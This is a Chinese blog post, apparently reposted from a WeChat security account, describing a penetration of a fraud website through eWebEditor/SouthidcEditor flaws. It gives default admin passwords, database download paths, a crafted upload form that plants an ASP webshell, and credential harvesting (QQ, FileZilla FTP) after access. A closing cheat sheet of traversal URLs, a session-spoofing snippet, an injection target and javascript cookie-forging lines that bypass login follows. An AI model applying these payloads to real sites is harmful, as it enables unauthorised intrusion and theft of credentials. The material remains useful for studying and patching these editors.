ewebeditor漏洞渗透某网站

  • A+
所属分类:安全文章

ewebeditor漏洞渗透某网站

Ewebeditor编辑器是CMS最常见的一款嵌入式多功能编辑器,通过它可以上传多种类型的文件,以及对文本进行格式化编辑,有了它可以让网站内容显示更加美观。但在配置使用过中如何配置不当,则可能存在安全漏洞,存在被渗透的风险。下面介绍如何利用ewebeditor漏洞成功获取某网站的webshell权限等相关过程。

1.1基本信息收集及获取后台管理权限

1.eWebEditor重要信息

1)默认后台地址:/ewebeditor/admin_login.asp

2)默认数据库路径:[PATH]/db/ewebeditor.mdb[PATH]/db/db.mdb[PATH]/db/%23ewebeditor.mdb

3)使用默认密码:admin/admin888 admin/admin 进入后台,也可尝试 admin/123456,如果简单密码不行,可以尝试利用burpsuite等工具进行密码暴力破解。

4)后台样式管理获取webshell。单击“样式管理”--可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上|asp|asa|aaspsp|cer,只要是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式,点击插入图片,上传WEBSHELL,在“代码”模式中查看上传文件的路径。

5)当数据库被管理员修改为aspasa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell

2.获取后台登陆地址

    获取后台通常有三种方法,第一种是通过SQL注入等扫描工具进行扫描获取;第二种是根据个人经验进行猜测,比如常用的管理后台为“http://www.somesite.com/admin”,也可能为admin888managemaster等;第三种是特殊类型,后台地址是特殊构造的,没有任何规律可循,怎么复杂就怎么构造,对这种网站可以通过旁注或者在同网段服务器进行嗅探,亦或者通过系统设计的逻辑漏洞,比如某一个页面需要管理认证才能访问,因为没有权限所以需要认证,程序会自动跳转到登录后台。在本例中通过测试获取后台地址为主站二级目录下即“http://034.748239.com/post/admin”,如图1所示,成功获取后台登录地址。

ewebeditor漏洞渗透某网站

1获取后台地址

3.进入后台

    使用帐号“admin”,密码“admin888”成功登录后台,如图2所示。系统功能非常简单,主要有银行帐号管理、案件中心、公正申请通缉令管理三大功能。

 

ewebeditor漏洞渗透某网站

2进入后台

1.2漏洞分析及利用

1.分析网站源代码

    通过查看网站使用的模板以及样式表等特征信息,判断该网站使用了SouthidcEditor编辑器,并通过扫描获取了其详细的编辑器地址:

http://034.748230.com/post/admin/SouthidcEditor

http://034.748230.com/post/admin/原版SouthidcEditor

下载其默认mdb数据库(http://034.748230.com/post/admin/SouthidcEditor/Datas/SouthidcEditor.mdb),并对其密码进行破解,获取其帐号对应的密码,使用该密码进行登录,成功进入后台,如图3所示。

ewebeditor漏洞渗透某网站

3进入SouthidcEditor编辑器后台管理

2.对样式表进行修改

   单击“样式管理”,在其中新建一个样式名称“112”,并在允许上传文件类型及文件大小设置中添加“|asp|cer|asasp”类型,如图4所示。

ewebeditor漏洞渗透某网站

4修改样式

3.使用上传漏洞进行上传

   将以下代码保存为htm文件,并打开该htm文件,上传一个asp的木马文件:

<formaction="http://034.748230.com/post/admin/%E5%8E%9F%E7%89%88SouthidcEditor/upload.asp?action=save&type=image&style=112&cusdir=a.asp"method=post name=myform enctype="multipart/form-data">

<inputtype=file name=uploadfile size=100><br><br>

<inputtype=submit value=upload>

</form>

ewebeditor漏洞渗透某网站

5使用构造的上传文件漏洞上传木马

   4.获取上传文件具体地址

   在管理菜单中单击“上传文件管理”,选择样式目录“112”,如图6所示单击上传的文件2015114224141253.asp,直接获取一句话后门的地址。


                                                             

ewebeditor漏洞渗透某网站

6查看并获取上传文件地址

1.3获取Webshell权限及信息扩展收集

1.获取webshell

使用中国菜刀管理工具连接该地址,成功获取webshell,如图7所示,其web目录中全是冒充证券、银行、移民公司、银监会等。

ewebeditor漏洞渗透某网站

7获取webshell

2.信息扩展

1)获取QQ帐号信息

    通过Webshell在系统盘获取QQ帐号信息“C:UsersAll UsersTencentQQProtectQscan”,该服务器上曾经使用QQ帐号1482327338登录过。如图8所示。

ewebeditor漏洞渗透某网站

8获取QQ帐号信息

2)获取Ftp帐号信息

    查看“C:Program Files (x86)”和“C:ProgramFiles”获取FileZilla Server配置文件FileZilla Server.xml,在该文件中保存有Ftp登录帐号和密码信息,如图9所示,在该文件中保存有ftp登录帐号和密码,其密码是采用md5加密。

ewebeditor漏洞渗透某网站

9获取ftp登录帐号和密码

3)诈骗关键字

   通过对网站代码进行分析,发现诈骗网站会在首页添加诸如“网上安全管理下载1”、“网上安全管理下载2”、“网上安全管理下载3”、“网上侦查系统” 和“远程安全协助”等关键字,诱使用户下载“检察院安全管理软件.exe”、“检察院安全控件.exe”、“简易IIS服务器.exe”、“网络安全控件.zip”等远程控制软件,或者访问指定的网站地址,进行银行帐号、密码获取,进而进行诈骗。

4)使用工具软件对欲仿冒的正规网站进行镜像

  HTTrack Website Copier/3.x [XR&CO'2013],%s -->" -%l "cs, en, *" http://www.spp.gov.cn/ -O1"F:\web\spp" +*.png +*.gif +*.jpg +*.css +*.js-ad.doubleclick.net/* -mime:application/foobar

1.4渗透及ewebeditor编辑器漏洞总结

1SouthidcEditor网站编辑器漏洞

数据库下载地址:

原版SouthidcEditor/Datas/SouthidcEditor.mdb

SouthidcEditor/Datas/SouthidcEditor.mdb

管理地址:

SouthidcEditor/Admin_Style.asp

SouthidcEditor/Admin_UploadFile.asp

上传文件保存地址:/SouthidcEditor/UploadFile或者/UploadFile

2SouthidcEditor数据库下载地址

Databases/h#asp#mdbaccesss.mdb

Inc/conn.asp

3ewebeditor遍历路径漏洞

ewebeditor/admin_uploadfile.asp过滤不严,造成遍历路径漏洞:

ewebeditor/admin_uploadfile.asp?id=14&dir=..

ewebeditor/admin_uploadfile.asp?id=14&dir=../..

ewebeditor/admin_uploadfile.asp?id=14&dir=http://www.****.com/../..

4)利用WebEditor session欺骗漏洞进入后台

Admin_Private.asp只判断了session,没有判断cookies和路径的验证问题。

新建一个test.asp内容如下:

<%Session("eWebEditor_User")= "11111111"%>

访问test.asp,再访问后台任何文件,例如Admin_Default.asp

5eWebEditor 2.7.0 注入漏洞

http://www.somesite.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

默认表名:eWebEditor_System默认列名:sys_UserNamesys_UserPass,然后利用sqlmapsql注入工具进行猜解。

6ewebeditor v6.0.0 上传漏洞

在编辑器中点击“插入图片”--网络--输入你的WEBSHELL在某空间上的地址(注:文件名称必须为:xxx.jpg.asp 以此类推…),确定后,点击“远程文件自动上传”控件(第一次上传会提示你安装控件,稍等即可),查看“代码”模式找到文件上传路径,访问即可,eweb官方的DEMO也可以这么做,不过对上传目录取消掉了执行权限,所以上传上去也无法执行网马.

7eWebEditor PHP/ASP后台通杀漏洞

进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了。

这时候你清空浏览器的url,然后输入

javascript:alert(document.cookie="adminuser="+escape("admin"));javascript:alert(document.cookie="adminpass="+escape("admin"));javascript:alert(document.cookie="admin="+escape("1"));

而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如/ewebeditor/admin/default.php,就会直接进去。

8eWebEditorNetupload.aspx上传漏洞

WebEditorNet主要是一个upload.aspx文件存在上传漏洞。默认上传地址:/ewebeditornet/upload.aspx,可以直接上传一个cer的木马,如果不能上传则在浏览器地址栏中输入javascript:lbtnUpload.click();成功以后查看源代码找到uploadsave查看上传保存地址,默认传到uploadfile这个文件夹里。


本文始发于微信公众号(小兵搞安全):ewebeditor漏洞渗透某网站

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: